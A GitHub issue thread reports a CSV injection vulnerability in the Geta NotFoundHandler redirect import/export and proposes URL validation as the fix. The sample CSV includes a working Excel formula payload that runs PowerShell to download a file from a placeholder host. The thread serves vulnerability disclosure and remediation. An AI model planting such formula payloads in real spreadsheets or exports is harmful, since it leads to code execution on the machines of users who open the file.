geta-notfoundhandler icon indicating copy to clipboard operation
geta-notfoundhandler copied to clipboard
verified publisher icon Geta

CSV Import / Export lacks validation and allows allows executable code to be added to uploaded / downloaded

Open GeekInTheNorth opened this issue 7 months ago • 4 comments

We have had an issue raised in a penetration test which proved that there was a CSV Injection attack possible on the CSV import / export functionality of this Add-On.

How to Reproduce:

  • Import redirects using a CSV which contains a CSV injection attack within one of the URL fields.
  • Export redirects into a CSV file
  • Open the CSV file in excel

The penetration tester was able to use CSV injection to push a powershell command into the database, when the CSV was then exported and opened in excel, the powershell script executed to download a file to the system.

This can be fixed by adding a simple URL validation for the Old and New URL fields and rejecting the CSV if any of the entries are invalid.

GeekInTheNorth avatar Jun 13 '25 16:06 GeekInTheNorth

@GeekInTheNorth possible to share somehow file samples?

valdisiljuconoks avatar Jun 17 '25 05:06 valdisiljuconoks

Hi @valdisiljuconoks,

I'll verify first with my client to make sure they are happy for anonymised details to be shared.

GeekInTheNorth avatar Jun 17 '25 07:06 GeekInTheNorth

Hi @valdisiljuconoks

I have been able to manufacture the same attack without needing to share screen captures from the report.

You'll need a CSV with this content:

OldUrl,NewUrl,WildcardSkippedAppend,RedirectType
https://www.example.com/missing-page,https://www.example.com/new-page/,False,Temporary
https://www.example.com/malicious-test/,=cmd|'/C powershell IEX(wget http://www.example.com/eicar.exe -OutFile eicar.exe)'!AO,False,Temporary

The import function has no validation which then allows you to upload the CSV with it's malicious content:

Image

When the user then exports the redirects and opens them in Excel, they receive prompts, but the user may well accept them as the CSV has come from a trusted source as far as they are concerned.

Image

Image

The simplest thing we can do here is to apply a URL verification on the CSV before we push it into the database. I haven't tested if the same can be achieved through the XML import / export, but the same validation would help.

Regards, Mark Stott

GeekInTheNorth avatar Jun 17 '25 08:06 GeekInTheNorth

@valdisiljuconoks

It also turns out you can perform this attack direct in the UI as neither OLD or NEW url fields have validation:

Image

GeekInTheNorth avatar Jun 19 '25 13:06 GeekInTheNorth